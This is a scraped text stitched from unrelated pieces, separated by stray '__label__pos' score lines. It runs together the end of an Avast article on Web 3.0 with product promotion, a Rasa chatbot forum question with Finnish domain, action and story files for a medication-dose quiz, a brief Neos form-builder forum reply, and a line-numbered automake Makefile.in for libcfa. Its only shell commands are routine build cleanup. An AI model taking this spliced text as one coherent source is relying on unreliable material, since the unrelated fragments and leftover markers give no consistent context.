大数一、十、百、千、万、亿、兆、京、垓、秭、穣、沟、涧、正、载(传统算书中的最大数)、极(某些非算学典籍记载的最大数),(以下为佛教使用的印度传入数字:恒河沙、阿僧祇、那由他、不可思议、无量大数)
小数分、厘、毫、丝、忽、微、纤、沙、尘、埃、渺、漠、(以下为佛经中出现的词,本为时间单位,部分人将其作为小数词头,部分词汇为汉语意译,部分词汇为音译:模糊、逡巡、须臾、瞬息、弹指、刹那、六德、虚空、清净、阿赖耶、阿摩罗、涅槃寂静)
www.zuoweixin.com
问题反馈联系QQ:暂无联系方式,也可发qq邮箱。
|
__label__pos
| 0.975309 |
ICode9
精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细
210. 异或运算
2022-07-29 13:31:36 阅读:143 来源: 互联网
标签:le 运算 210 int 整数 异或 线性 define
题目链接
210. 异或运算
给定你由 \(N\) 个整数构成的整数序列,你可以从中选取一些(至少一个)进行异或(\(\operatorname{xor}\))运算,从而得到很多不同的结果。
请问,所有能得到的不同的结果中第 \(k\) 小的结果是多少。
输入格式
第一行包含整数 \(T\),表示共有 \(T\) 组测试数据。
对于每组测试数据,第一行包含整数 \(N\)。
第二行包含 \(N\) 个整数(均在 \(1\) 至 \(10^{18}\) 之间),表示完整的整数序列。
第三行包含整数 \(Q\),表示询问的次数。
第四行包含 \(Q\) 个整数 \(k_1,k_2,…,k_Q\),表示 \(Q\) 个询问对应的 \(k\)。
输出格式
对于每组测试数据,第一行输出 Case #C:,其中 \(C\) 为顺序编号(从 \(1\) 开始)。
接下来 \(Q\) 行描述 \(Q\) 次询问的结果,每行输出一个整数,表示第 \(i\) 次询问中第 \(k_i\) 小的结果。
如果能得到的不同结果的总数少于 \(k_i\),则输出 \(-1\)。
数据范围
\(1 \le N,Q \le 10000\),
\(1 \le k\_i \le 10^{18}\)
输入样例:
2
2
1 2
4
1 2 3 4
3
1 2 3
5
1 2 3 4 5
输出样例:
Case #1:
1
2
3
-1
Case #2:
0
1
2
3
-1
注意:只选取一个数字进行运算,则结果为该数字本身。
解题思路
线性基
由于线性基表示的空间和原向量组表示的空间等价,所以可以先求出线性基,用线性基来表示第 \(k\) 小数,由于线性基中每一个最高位的元素仅有一个,可以将每一个线性基元素当作一位,求第 \(k\) 小数即将 \(k\) 的二进制数表示出来相应乘以线性基元素,另外由于线性基不能表示 \(0\),所以需要判断原向量组是否线性相关或无关,如果向量组的秩 \(k<n\),则线性相关,即可以表示出 \(0\),否则不能
• 时间复杂度:\(O(63n)\)
代码
// Problem: 异或运算
// Contest: AcWing
// URL: https://www.acwing.com/problem/content/description/212/
// Memory Limit: 32 MB
// Time Limit: 1000 ms
//
// Powered by CP Editor (https://cpeditor.org)
// %%%Skyqwq
#include <bits/stdc++.h>
//#define int long long
#define help {cin.tie(NULL); cout.tie(NULL);}
#define pb push_back
#define fi first
#define se second
#define mkp make_pair
using namespace std;
typedef long long LL;
typedef pair<int, int> PII;
typedef pair<LL, LL> PLL;
template <typename T> bool chkMax(T &x, T y) { return (y > x) ? x = y, 1 : 0; }
template <typename T> bool chkMin(T &x, T y) { return (y < x) ? x = y, 1 : 0; }
template <typename T> void inline read(T &x) {
int f = 1; x = 0; char s = getchar();
while (s < '0' || s > '9') { if (s == '-') f = -1; s = getchar(); }
while (s <= '9' && s >= '0') x = x * 10 + (s ^ 48), s = getchar();
x *= f;
}
const int N=10005;
int t,n,k,q;
LL x,a[N];
int main()
{
scanf("%d",&t);
for(int T=1;T<=t;T++)
{
printf("Case #%d:\n",T);
scanf("%d",&n);
for(int i=0;i<n;i++)scanf("%lld",&a[i]);
k=0;
for(int i=62;i>=0;i--)
{
for(int j=k;j<n;j++)
if(a[j]>>i&1)
{
swap(a[k],a[j]);
break;
}
if(!(a[k]>>i&1))continue;
for(int j=0;j<n;j++)
if(j!=k&&(a[j]>>i&1))a[j]^=a[k];
k++;
if(k==n)break;
}
reverse(a,a+k);
bool f=k<n;
scanf("%d",&q);
while(q--)
{
scanf("%lld",&x);
x-=f;
if(x>=(1ll<<k))
{
puts("-1");
continue;
}
LL res=0;
for(int i=0;i<k;i++)
if(x>>i&1)res^=a[i];
printf("%lld\n",res);
}
}
return 0;
}
标签:le,运算,210,int,整数,异或,线性,define
来源: https://www.cnblogs.com/zyyun/p/16531957.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。
专注分享技术,共同学习,共同进步。侵权联系[[email protected]]
Copyright (C)ICode9.com, All Rights Reserved.
ICode9版权所有
|
__label__pos
| 0.881697 |
A changeset is a set of changes between revisions of files under revision control, which should be treated as an indivisible group (i.e., an atomic package).
learn more… | top users | synonyms
73
votes
9answers
12k views
With Mercurial, how can I “compress” a series of changesets into one before pushing?
Let's say I have a local and a remote Mercurial repository. Now, I start working on a feature. I work on it, and when I think it's done, I commit the changeset. Testing it a bit more, I find that I ...
10
votes
3answers
1k views
Injecting mercurial changeset as version information in a C executable
I would like the executables for a project I am working on to have the latest mercurial changeset recorded so that when a user complains about buggy behavior, I can track which version they are using. ...
6
votes
1answer
760 views
View TFS changeset details in console
I am using TFS and want to view all changes on a changeset that contains changes in several files. Viewing this in the GUI is not efficient as I have to open every single file. What I want to do is to ...
10
votes
4answers
7k views
How do I figure out which changeset a label in TFS was applied to?
We're using Team Foundation Server and we are using Labels to create points in our version history where specific versions (either internal or external) were produced. Right now we were wondering if ...
6
votes
2answers
3k views
TFS: List changesets that have not been merged
Environment TFS 2010. Three branches: Main, Development and Release. Question I would like to easily retrieve a list of changesets that have not been fully merged into all three branches. For ...
3
votes
1answer
1k views
How to merge TFS change sets programmatically?
I know how to merge a change set in TFS 2010 using the command line command "tf merge". Is there a way I can do this in C# with code. I want to merge specific change sets only (cherry pick), one at ...
40
votes
4answers
19k views
Mercurial - all files that changed in a changeset?
How can you determine all the files that changed in a given changeset? I'm not looking for a diff in this case, just a list of add/remove/modifications. hg log -vprX does a list of diffs but I ...
7
votes
4answers
5k views
How can I extract all changed files of a changeset in Mercurial?
Until recently we have been using SVN for all projects of our web studio, and there is a very convenient feature present in several clients like Subversive and TortoiseSVN that can extract all files ...
8
votes
5answers
7k views
Java: how to get mercurial current changeset number for use in program
I've recently started using mercurial for version control in a Java project. When I run my program, the input parameters it has used to produce certain a output, are written to a specific file. It ...
11
votes
1answer
1k views
How to compare sets of changesets between 2 Mercurial branches?
I've got a (remote) Hg repository with a couple branches. I want to verify that branch A has every changeset that branch B has (it may have more, and that's OK). Is there an easy way to do this with ...
16
votes
6answers
9k views
How can I open a single changeset in TFS from within Visual Studio
Someone emailed me a TFS changeset ID and now I am trying to open this single changeset. Is there an easy was to do this from within Visual Studio (VS 2008 if it matters)?
12
votes
5answers
5k views
Getting TFS to put the changeset in the assembly version
I have got a Team Foundation Server Build running cleanly. It produces several assemblies and I would like the assemblies versions to have the last number to be the changset number. That is, if I ...
5
votes
3answers
857 views
List SIZE of mercurial changesets?
Looking to quantify how much change happened in each changeset. Any quick way to list maybe kb diff between two revisions?
4
votes
3answers
2k views
A way to find out all affected files of a workItem or group of chgsets in TFS 2008?
I'm trying to figure out a way to find out which files were affected by a work item in TFS 2008. I realize that this is a duplication of a question already asked by someone else here - ...
4
votes
2answers
1k views
convert changeset(s) to shelveset
Is it possible to create a shelveset from the diff of two versions of one branch just by some operations in tfs/tfpt? e.g. create a shelveset from (changeset 2013 -> changeset 2034)
1
vote
1answer
2k views
View a list of all files changed as part of a Workitem in TFS
If I am checking in code against a workitem, on each check in a changeset is created. I can view the links tab of the workitem and then view each changeset to see the files that have been changed. ...
5
votes
1answer
3k views
How and where does TFS 2008 / TFS 2010 store changesets?
I am attempting to understand how TFS 2008 (and 2010 if it's different) store and communicate details of a set of changes in a changeset. Now when I commit to a Subversion hosted project, the client ...
3
votes
1answer
126 views
What exactly is a Mercurial changeset?
If you pull down a changeset are you pulling down the full copy of all files that were changed in the changeset? Or are you pulling down some type of diff report which Mercurial will then apply to ...
2
votes
2answers
714 views
Is there a way to show the TFS changeset number after a check-in?
Is there a way, with power tools or other extensions, to make it so that the changeset number is be displayed on an alert? Currently it displays on the status bar, but disappears after a while, or at ...
2
votes
1answer
262 views
Difference between a changeset and a patch?
What is the difference a changeset and a patch? I was using hg today and I noticed the import command mentions that it is used to "import an ordered set of patches." What is a patch?
2
votes
2answers
774 views
Mercurial Subrepos, how to control which changeset I want to use for a subrepo?
I am reading up on subrepos, and have been running some tests locally, seems to work OK so far, but I have one question. How do I specify/control which changeset I want to use for a particular ...
0
votes
1answer
596 views
Define Changeset for insert query in liquibase
I have two table as following : CREATE TABLE StudentMaster ( sId SERIAL, StudentName VARCHAR(50) ); CREATE TABLE StudentClassMap ( studnetId BIGINT UNSIGNED NOT NULL, studentClass ...
|
__label__pos
| 0.677695 |
This documentation is archived and is not being maintained.
__alignof Operator
Microsoft Specific
Returns a value, of type size_t, that is the alignment requirement of the type.
__alignof( type )
For example:
Expression Value
__alignof( char ) 1
__alignof( short ) 2
__alignof( int ) 4
__alignof( __int64 ) 8
__alignof( float ) 4
__alignof( double ) 8
__alignof( char* ) 4
The __alignof value is the same as the value for sizeof for basic types. Consider, however, this example:
typedef struct { int a; double b; } S;
// __alignof(S) == 8
In this case, the __alignof value is the alignment requirement of the largest element in the structure.
Similarly, for
typedef __declspec(align(32)) struct { int a; } S;
__alignof(S) is equal to 32.
One use for __alignof would be as a parameter to one of your own memory-allocation routines. For example, given the following defined structure S, you could call a memory-allocation routine named aligned_malloc to allocate memory on a particular alignment boundary.
typedef __declspec(align(32)) struct { int a; double b; } S;
int n = 50; // array size
S* p = (S*)aligned_malloc(n * sizeof(S), __alignof(S));
For more information on modifying alignment, see:
END Microsoft Specific
See Also
Expressions with Unary Operators | C++ Keywords
Show:
|
__label__pos
| 0.943903 |
Cloud Security
Container Vulnerability Scanning: Top 5 Tools
In software engineering, containers have evolved as fundamental elements for bundling, disseminating, and executing applications. These compact and self-contained executable packages house everything needed to run software, from the code itself to system tools, libraries, and configurations. Nevertheless, as with technological innovation, they are not immune to threats and require specific steps to ensure security. […]
Mahendra D.
Written by Mahendra D.
August 17, 2023 | 8 min read
In software engineering, containers have evolved as fundamental elements for bundling, disseminating, and executing applications. These compact and self-contained executable packages house everything needed to run software, from the code itself to system tools, libraries, and configurations. Nevertheless, as with technological innovation, they are not immune to threats and require specific steps to ensure security. This brings us to the critical aspect of container vulnerability scanning.
Container vulnerability scanning is a critical component of any cyber-defense blueprint; it focuses on detecting, categorizing, and prioritizing weak spots in computer systems, software, and network infrastructures. This offers vital visibility into potential threats that could undermine the system’s security, thus paving the way for suitable remediation strategies.
In this piece, we delve deep into Container Vulnerability Scanning – a fusion of the above-mentioned concepts, where we scrutinize potential vulnerabilities inherent to containers. We will elaborate on the types of container vulnerabilities, how they can materialize, various container vulnerability scanning methodologies, and finally, suggest the top five tools for effective container vulnerability scanning.
Table of Contents:
What is Container Vulnerability Scanning?
Container vulnerability scanning is a specific kind of vulnerability scanning focused on unearthing security risks in container images. You can think of container images as the blueprint from which containers spring into action, complete with the application and its sidekicks, aka dependencies. If there’s a chink in this blueprint, each container derived from it will inherit that chink. That’s why spotting and patching vulnerabilities right at the source – the image level – is essential for keeping a container environment safe.
Now, let’s chat about how this scanning works. It’s like giving a container image a thorough health check to find known vulnerabilities. These could be hiding anywhere within the container – in the application code, system libraries, or other dependencies. This check-up usually happens automatically and uses a database chock full of known security issues to compare with the contents of a container image.
But there’s something important to remember here. Container vulnerability scanning isn’t something you do once and forget about. It needs to be woven into the fabric of the software development process. The ideal way to do this is to run scans at every stage – when crafting images, just before you launch them, and constantly after they’re live. That way, even if new vulnerabilities pop up after a container is live, they can be tracked down and tackled quickly, helping to make your application environment more secure overall.
What are the Different Types of Container Vulnerabilities?
Container technologies, while revolutionizing software deployment, bring new vulnerabilities that can compromise your system’s security. Understanding the diverse types of container vulnerabilities is the first step in devising an effective security strategy.
1. Image Vulnerabilities
These are probably the ones you’ll encounter most frequently. They spring up when the images used to mold containers are either out-of-date or insecure. Picture an image as a sort of container clone – it’s a blueprint that becomes a live container. If this blueprint carries old software packages or libraries known to be riddled with security flaws, those same flaws will infiltrate the living container.
So, how can you tackle these vulnerabilities? One approach is to ensure your images are regularly spruced up with the freshest, safest versions of software and libraries. And let’s not forget about container vulnerability scanning tools – they’re excellent at pinpointing the risks within your container images.
2. Runtime Vulnerabilities
These security issues crop up while a container is actively running. Think of apps operating with privileges they don’t need, containers set up with flimsy configurations, or unsecured runtime settings for containers.
It’s wise to stick to the principle of least privilege or PoLP to put a lid on runtime vulnerabilities. In a nutshell, your applications should only be armed with the bare minimum of permissions they need to operate effectively. Adhering to good practices for securely setting up containers can go a long way. Don’t underestimate the power of runtime security tools, either – they’re great at monitoring container behavior, spotting, and dealing with these risks before they can cause trouble.
3. Orchestrator Vulnerabilities
These spring up in the management systems that keep the containers in check, like Kubernetes or Docker Swarm. Remember, an orchestrator is a boss – it has the power to start, pause, and network containers. If a hacker manages to take the reins of the orchestrator, they could wreak havoc on your entire container landscape.
How to fend off orchestrator vulnerabilities? Start by buttoning up access to the orchestrator. Ensure that only the right people have access, and keep that list as short as possible. Staying up to date with orchestrator software is also crucial – don’t let old, insecure versions expose you to unnecessary risk. And, of course, always use robust authentication methods. Stay vigilant with these orchestrator security best practices to significantly lower this risk.
4. Supply Chain Vulnerabilities
These issues occur when bad actors get their way into the software supply chain, and like a wolf in sheep’s clothing, they lace malicious code into open-source libraries or components. These elements can then find their way into your container images without raising any alarms.
Dealing with this type of vulnerability requires a keen eye because it’s not just about scrutinizing your code – you must go beyond that. Every library and component your application uses must be put under the microscope. A strong software composition analysis tool, capable of scanning every single component of your software, becomes an essential ally in your security arsenal to ward off this threat.
Importance of Container Vulnerability Scanning
With the rise in popularity of containerization technologies, the security of these containers has become paramount. Container Vulnerability Scanning is a critical practice that every organization should adopt to ensure the safety of their software and data. Here, we’ll discuss four main reasons why Container Vulnerability Scanning is essential.
1. Early Detection of Vulnerabilities
Regular container vulnerability scanning allows organizations to catch vulnerabilities at the earliest stages of the software development cycle. Detecting and nipping these issues in the bud before they have a chance to become a real headache saves both time and resources that might have otherwise been drained fixing post-deployment issues. Not just that, but it also minimizes potential damage that could spiral out of unchecked vulnerabilities.
With early detection, the number of containers with chinks in their armor that manage to infiltrate the production environment is drastically cut down. Consequently, this reduces the overall risk profile of an organization’s software infrastructure, making the services they roll out to users considerably more secure.
2. Compliance with Regulations
Many industries have stringent regulations, compelling companies to conduct regular vulnerability evaluations of their IT systems. In settings where containers are an integral part of the framework, container vulnerability scanning takes center stage in these assessments.
Carrying out routine scans has the added benefit of furnishing necessary documentation, and demonstrating compliance with the regulations. It provides organizations with a solid method to assure regulators that they leave no stone unturned to shield their IT systems from identified vulnerabilities.
3. Keeping Up with Threat Landscape
We’re living in a world where the threat landscape isn’t static; it’s always shifting, with new vulnerabilities coming to light and older ones getting patched up. Regular container vulnerability scanning lets organizations stay in sync with these incessant changes.
By routinely updating their vulnerability databases and scanning their containers, organizations can establish assurance of protection against the most recent threats known. This practice further aids in sustaining the security of their systems as the newest updates and patches roll out.
Types of Container Vulnerability Scanning
Different strategies and tools are required in cybersecurity to keep up with the ever-evolving threat landscape. This also holds for container vulnerability scanning, where different types cater to various aspects of container security. Here, we dive into four main types of container vulnerability scanning.
1. Static Analysis
Also known as Static Application Security Testing (SAST), Static Analysis scans container images without launching them. This examination sifts through the code, libraries, and dependencies housed in the image, searching for recognized vulnerabilities.
The benefit of this approach is that it uncovers vulnerabilities at an early stage in the development cycle, even before the containers are dispatched. It can seamlessly integrate into the Continuous Integration/Continuous Deployment (CI/CD) pipeline, enabling automated examinations during the build phase.
2. Dynamic Analysis
Dynamic Analysis, or Dynamic Application Security Testing (DAST), evaluates running containers for potential weak spots. It offers a real-time snapshot of how containers behave and perform, thereby aiding the identification of problems that may only crop up during runtime.
This examination is particularly handy in spotting vulnerabilities associated with runtime settings and configuration, which might not be discernible in static analysis. It’s also adept at identifying insecure inter-container communication and potential container breakout vulnerabilities.
3. Software Composition Analysis
Software Composition Analysis (SCA) is an approach that inspects the open-source components incorporated into container images. It pinpoints recognized vulnerabilities in these elements that could compromise the containers’ security.
Considering the extensive adoption of open-source tools and libraries in software development, SCA has emerged as a pivotal part of container vulnerability scanning. It fortifies the software supply chain, guaranteeing that the open-source components deployed in your containers are devoid of known vulnerabilities.
4. Runtime Protection
Runtime protection implies overseeing the behavior of active containers to discern any irregularities that might signal a security risk. It leverages preset rules or machine learning algorithms to spot actions that deviate from the expected behavior.
This scanning is vital to intercepting threats that may have been missed during static or dynamic analysis. It offers uninterrupted security for your containers, assuring that any emerging threats are detected immediately as they appear.
Top 5 Tools for Container Vulnerability Scanning
Choosing the right tool for container vulnerability scanning is vital for effective security. The tool should identify vulnerabilities and offer comprehensive features to mitigate and manage those vulnerabilities. Here, we list the top 5 commercial tools for container vulnerability scanning.
1. PingSafe
PingSafe is a potent tool built to safeguard your containerized environments, honing in on Kubernetes, Docker, and serverless security. It boasts an extensive set of features, such as:
• Examining and supervising containers like ECS, AKS, EKS, Fargate, Kubernetes, Docker images, etc., and orchestration components for potential vulnerabilities.
• Identifying container configuration flaws against renowned standards like CIS, PCI, etc., ensuring your container configurations align with industry best practices.
• Spotting concealed secrets in container images and host VMs, aiding in preventing unauthorized access to confidential information.
• Capability to find vulnerabilities in container images housed in ECS/Kubernetes clusters and private container registries, offering a thorough vulnerability evaluation.
• Graph-based depiction of ECS/Kubernetes clusters, facilitating easy comprehension and control of your container environment.
2. Aqua Security
Aqua Security is a top-tier container security instrument that delivers container image scanning and runtime protection. It boasts features such as:
• Thorough scanning of container images for known vulnerabilities.
• Identification of misconfigurations in container deployments.
• Synchronization with CI/CD pipelines for early detection and remediation of vulnerabilities.
3. Sysdig Secure
Sysdig Secure is a tool crafted specifically for container and Kubernetes security. It proposes features like:
• Scanning of container images located in registries and within CI/CD pipelines.
• Detection of runtime threats based on pre-established rules and machine learning.
• Detailed forensics and audit trails for containers.
4. Twistlock by Prisma Cloud (Palo Alto Networks)
Twistlock, incorporated within Prisma Cloud, is a holistic cloud-native security platform. It provides features such as:
• Scanning for vulnerabilities in container images and serverless functions.
• Runtime defense mechanisms for both containers and hosts.
• Compliance verification and enforcement are rooted in industry standards.
5. StackRox
Now under the Red Hat umbrella, StackRox provides a security platform built specifically for Kubernetes. Its offered features encompass:
• Scanning for vulnerabilities within images in both registries and deployments.
• Spotting hazardous configurations and deployments that don’t comply with the rules.
• Utilizing machine learning for threat detection during runtime.
These applications offer a well-rounded strategy for container vulnerability scanning, including various features designed to spot and manage vulnerabilities in your containerized setups. The appropriate tool for you will depend on the unique needs of your organization and the nature of your container deployment.
Conclusion
In sum, safeguarding your containerized applications is indispensable to current software development. Incorporating Container Vulnerability Scanning through efficient tools can substantially fortify your resistance against potential hazards. Recognizing diverse vulnerabilities and applying the best practices can notably diminish the risk levels associated with your containerized applications.
For those seeking an all-encompassing solution to fortify your containerized settings, PingSafe is worth considering. Offering a broad range of features, from scanning both server-based and serverless containers to spotting configuration flaws and hidden secrets, PingSafe delivers a sturdy and exhaustive approach to container security. Don’t delay; make the initial move toward securing your containerized settings with PingSafe today.
Similar Articles
|
__label__pos
| 0.902639 |
General
Why WebSockets gain popularity?
Web applications are becoming more and more interactive. They do not resemble static web pages anymore. That is why they require functionality like instant messaging, user status updates, real time data view, peer to peer interaction, etc. Until recently, the most common way of such communication was polling via HTTP – the most simple but not very effective way, and here is why.
1. Server cannot message a user directly, it can only process and respond to client’s request. In order to receive updates the clients are sending requests all the time. And in most cases the server responds “nothing new”. The server is loaded with those numerous iterations without any useful information being actually transferred.
2. HTTP allows client requests and server responses go only in successive manner, one after another.
3. HTTP requests and responses include headers that may very long, if cookie values are passed. They are transferred with each request and response and do not carry any useful data.
As the result the communication is not instant, and we have sufficient server load which grows dramatically for large amounts of users and my collapse the application. There were attempts to solve these problems, but these were rather patches and hacks then truly elegant solutions.
Long Polling was aimed at reducing the number of request-response iterations. Unlike traditional polling, user request has a timeout, staying open for certain time. The server responds to this request only if an event happens. If nothing happens during the given period, the server responds closing the request. Then a new request can be issued. From the client side, events happen almost in real time, but slight delay may happen between requests. For the server, this reduces the number of request-response iterations, but the problem with redundant headers remains. Also, long polling requires sufficient memory to keep a number of idle connections – one for each user.
Server-Sent Events protocol works in a similar way to long polling, but the connection stays open even after an event is sent to user. This reduces server load, but the connection is one way, which is fine for displaying changing values, but is not sufficient for messaging.
WebSocket technology was introduced in 2011 and became a breakthrough. Unlike the other solutions it provided bidirectional, full-duplex communication between server and client over a single TCP connection. WebSocket does not require the request-response routine, allowing both client and server message each other instantly after the initial handshake. Each message is framed with just 2 bytes instead of bulky HTTP headers. Client and server can talk independently, each able to send and receive information at the same time.
As you can see, with WebSocket you have no redundant requests and responses and no extra load, only necessary bytes are sent. This reduces delays and server load vastly, allowing web applications to perform modern tasks in the most effective way.
The WebSocket protocol is currently supported by most major browsers, including Google Chrome, Microsoft Edge, Internet Explorer, Firefox, Safari and Opera. So there are no compatibility issues. And this makes it the best universal solution to date.
Leave a Comment
Your email address will not be published. Required fields are marked *
*
|
__label__pos
| 0.749079 |
The class and object have the same notations. I wonder if their meanings is correct like my understanding or not! It shows relationships between classes, objects, attributes, and operations. The attribute section of a class lists each of the class's attributes on a separate line. The class diagram is the main building block of object-oriented modeling. Notations of objects and classes in UML. The class diagram in above is an example of a simple UML diagram, but UML diagrams can get much more complicated. If this is possible, the class diagram is complete. Class Diagram could be divided into three components – The Upper Section which consists of the class name, and is a … In UML class diagram, where to show DAO methods of a domain class. Below are some object diagram of UML which are as follows: 1. Class Diagram or the Class Notation is the graphical representation of the ‘class’ of the program, which consists of the class name, attributes, method names, as well as information of other associated components present in the class. Class Diagram. The following information describe the details of creating UML class diagrams. Notes and stereotypes. ... Not for this class. UML class diagram notations: Differences between Association, Aggregation and Composition. Object Names. Classes and interfaces in UML show architecture and features of the designed system. The subject (of use cases) is the system under design or consideration to which a set of use cases apply.The subject could be a physical system, software program, or smaller element that may have behavior, e.g. Aggregation is a special type of association in which objects are assembled or configured together to create a more complex object. A class is a building block of an Object-Oriented Program. Class Diagrams. Is the class diagram complete? 54 and 55. The forward and reverse engineering is influenced by the Class Diagram. The example below provides a useful overview of the hotel management system. Stereotypes are defined with the class keyword, << and >>.. You can also define notes using note left of, note right of, note top of, note bottom of keywords.. You can also define a note on the last defined class using note left, note right, note top, note bottom.. A note can be also define alone with the note keywords, then linked to other objects using the .. symbol. 13. Object: An object is an entity which is used to describe the behavior and functions of a system. These features include attributes, operations, and associations. Is the class diagram correct? Efficient and appropriate use of notations is very important for making a complete and meaningful model. UML Class Diagram are used in modeling. An Object Diagram is a structural diagram which uses notation similar to that of class diagrams. Every single object is represented such as a rectangular shape, which provides the name through the object as well as class underlined along with shared using a colon. Find class diagram examples and templates that you can instantly edit online inside this class diagram guide. The UML representation of a class is a rectangle containing three compartments stacked vertically, as shown in the Figure: Attribute. When it comes to class diagram relationship this is one of the most misunderstood relationships. It shows the attributes, classes, functions, and relationships to give an overview of the software system. Any UML class notation is generally expressed as follows, UML Class Symbol. This question will be answered in Interaction View. For activity diagram using swimlanes, make sure the start point is placed in the top left corner of the first column. 1. And because the class diagram is so foundational, the remainder of this article will focus on the class diagram… Sequence diagrams are a type of Unified Modeling Language (UML) diagram that shows interactions over time. Get started on a class diagram by clicking the template below. Week 2: UML Class Diagram Basics (parts 2 and 3) Class Diagram is one of important types of UML Diagrams. Saved by Kaustubh Joshi. They’re also called event diagrams. Basic Activity Diagram Notations and Symbols Initial State or Start Point. 1. Pretty sure I know what Association means. A use case represents a user goal that can be achieved by accessing the system or software application. 3. UML Notation. UML Class Diagram is a type of Structure Diagrams that shows the classes of a system, attributes, operations, and the relationships between them. A class diagram shows classes, the relationships between classes, constraints, and attributes of classes. variant of each of five notations used in UML class diagrams is the more suitable with respect to human performance. Active 4 years, 11 months ago. In software engineering, a class diagram in the Unified Modeling Language (UML) is a type of static structure diagram that describes the structure of a system by showing the system's classes, their attributes, operations (or methods), and the relationships among objects.. Drawing classes. Apr 18, 2019 - UML class diagram tutorial to learn about class diagram notations, class diagram definition, how to draw a class diagram and best practices. A class diagram can show the relationships between each object in a hotel management system, including guest information, staff responsibilities, and room occupancy. An aggregation describes a group of objects and how you interact with them. The basic element in a class diagram is a class. The Class Diagram Name dialog box closes and Diagram Window opens with a Class Diagram labeled CLD_1 - MemberInstitutions. Add notations After you have completed the step-by-step procedure outlined in the tutorial, your class diagram should look similar to the following example. These diagrams contain the following elements: 1. Class diagram for a hotel management system. In UML, we can also represent an abstract class. However, the class diagram offers a prime example of the structure diagram type, and provides us with an initial set of notation elements that all other structure diagrams use. In the interaction view, we will show how the class diagram can be used to answer all required queries of the IT system. Use Case. Class Diagram The following materials are adapted from The Unified Software Development Process and The Unified Modeling Language User Guide written by the three Amigos. Class. We are able to design object diagrams by instantiating classifiers. I'm confused about some of the notations of UML class diagrams. Classes , which represent entities with common characteristics or features. 1. Class Diagram Integers User Interface Initials Names Technology Productivity Ann Groomsmen. A class diagram is used to visualize, describe, document various different aspects of the system, and also construct executable software code. This is a fairly simple diagram. Learn how to make classes, attributes, and methods in this UML Class Diagram tutorial. Sequence Diagram Notations. Please help me Figure 1 depicts a start at a simple UML class diagram for the conceptual model for a university. Directed Association. Fundamental Object Diagram Symbols and Notations. Timing Diagram; Pic. UML Class Diagram Shapes. Checklist 4.5 Verifying Class Diagrams of the Structural View. Adding a constraint in UML class diagram. Class diagrams. This section describes Aggregation and Composition Notations used in a UML Class Diagram. Class Roles or Participants Class roles describe the way an object will behave in context. Hot Network Questions Why does a polynomial with real, simple roots change its sign between its roots? There are 3 primary inter-object relationships: Association, Aggregation, and Composition. A sequence diagram is a good way to visualize and validate various runtime scenarios. Class Diagram Notations. A UML class diagram models the static structure of a system. Hi All, I have a class diagram with strange relationship notations. For Data: Class diagram Class Diagram:-Class diagrams describe the static structure of a system, or how it is structured rather than how it behaves. 0. Note that it doesn’t even come close to explaining all the features of UML. A class whose functionalities are not defined is called an abstract class. Ideally, you may illustrate the flow of the association by utilizing a directed association. A small filled circle followed by an arrow represents the initial action state or the start point for any activity diagram. 24. Types of Class Diagram. The notations of objects and classes in UML are shown in pp. Introduction to the notions of "Class" and "Attribute." The Diagram … Week 1: Introduction and UML Class Diagram Basics (part1) Introduction as to what a data model is, why data modelling matters, and the concepts of modelling languages and notations. Object Diagrams use real world examples to depict the nature and structure of the system at a particular point in time . The components and the deployment diagram’s base is the class diagram. In software engineering, a class diagram in the Unified Modeling Language (UML) is a type of static structure diagram that describes the structure of a system by showing the system's classes, their attributes, operations (or methods), and the relationships among objects. Aggregation and Composition Notations represent a special type of association called 'aggregation' between a pair of parent and child classes, where the child class is considered as a part of the parent class. The class diagram is a central collection of information -- and can be quite overwhelming ... and the example in the book deliberately shows you every possible variation. However, as your system scales and grows, it becomes increasingly difficult to keep track of all these relationships. class diagram clarification for hospital management. Viewed 94k times 43. Classes are depicted as boxes with three sections, the top one indicates the name of the class, the middle one lists the attributes of the class, and the third one lists the methods. By default, an association that exists between classes is bi-directional. 2. Example of a Class Diagram for a Banking System. The arrowhead indicates the container-contained relationship. Ask Question Asked 6 years, 7 months ago. The UML Class diagram is used to visually describe the problem domain in terms of types of objects (classes) related to each other in different ways. In Visual Paradigm, you can make use of the sub-diagram feature to describe the interaction between user and system within a use case by creating a sub-sequence diagram under a use case.You can also describe the use case scenario using the Flow of Events editor. Class diagram notations.
2020 class diagram notations
|
__label__pos
| 0.998257 |
导读 搭建好 Cobbler 服务器后,我们需要先新建一个 VM 虚拟机,获取 MAC地址。定制主机配置是根据 MAC 地址来识别主机的。
环境:
CentOS Linux release 7.6.1810
VMware Workstation Pro 14
新建VM 虚拟机
MAC 地址为 00:50:56:3E:F0:C6
使用 Cobbler 安装系统时,指定好系统的 IP地址,镜像,网关,主机名等信息
[root@localhost kickstarts]# pwd
/var/lib/cobbler/kickstarts
[root@Jaking kickstarts]# cobbler system add \
--name=Jaking-custom \
--mac=00:50:56:3E:F0:C6 \
--profile=CentOS-7.6-x86_64 \
--ip-address=192.168.1.163 \
--subnet=255.255.255.0 \
--gateway=192.168.1.1 \
--interface=eth0 \
--static=1 \
--hostname=Jaking-custom \
--name-servers="192.168.1.1" \
--kickstart=/var/lib/cobbler/kickstarts/CentOS7.ks
查看 system 列表
[root@Jaking kickstarts]# cobbler system list
Jaking-custom
同步 Cobbler 配置
[root@Jaking kickstarts]# systemctl restart cobblerd
[root@Jaking kickstarts]# cobbler sync
查看 DHCP 配置,发现 DHCP 服务器,已经加入 IP 和 MAC 的对应关系。
[root@Jaking kickstarts]# cat /etc/dhcp/dhcpd.conf
# ******************************************************************
# Cobbler managed dhcpd.conf file
# generated from cobbler dhcp.conf template (Sat Jan 4 10:52:04 2020)
# Do NOT make changes to /etc/dhcpd.conf. Instead, make your changes
# in /etc/cobbler/dhcp.template, as /etc/dhcpd.conf will be
# overwritten.
# ******************************************************************
ddns-update-style interim;
allow booting;
allow bootp;
ignore client-updates;
set vendorclass = option vendor-class-identifier;
option pxe-system-type code 93 = unsigned integer 16;
